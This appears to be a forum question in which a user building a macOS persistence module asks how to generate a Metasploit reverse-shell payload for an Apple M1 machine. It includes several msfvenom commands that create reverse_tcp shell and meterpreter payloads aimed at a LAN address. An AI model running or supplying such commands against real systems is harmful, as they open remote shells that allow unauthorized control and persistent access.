# Create and bind to Metasploit reverse shell on Apple Sillicon system

Tags: metasploit, apple, reverse-shell

I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable with `msfvenom`, the system I'm developing on has an M1 chip and I'm not sure how to generate a payload for this system. I've tried this so far:

```
Generate payload: metasploit-framework/msfvenom -p osx/armle/shell/reverse_tcp LHOST=10.255.104.146 LPORT=4444 -f sh -o payload

metasploit-framework/msfvenom -p osx/aarch64/meterpreter/reverse_tcp  RHOST=0.0.0.0 RPORT=4444 

metasploit-framework/msfvenom -p osx/armle/shell/reverse_tcp LHOST=10.255.104.146 LPORT=4444 -o payload
```

To develop a metasploit reverse shell on an M1 system which command should I run? How do I know which architecture, payload and file format to use? Are there any caveats or configurations I need to take care of when creating a reverse shell that binds and spawns on the same system?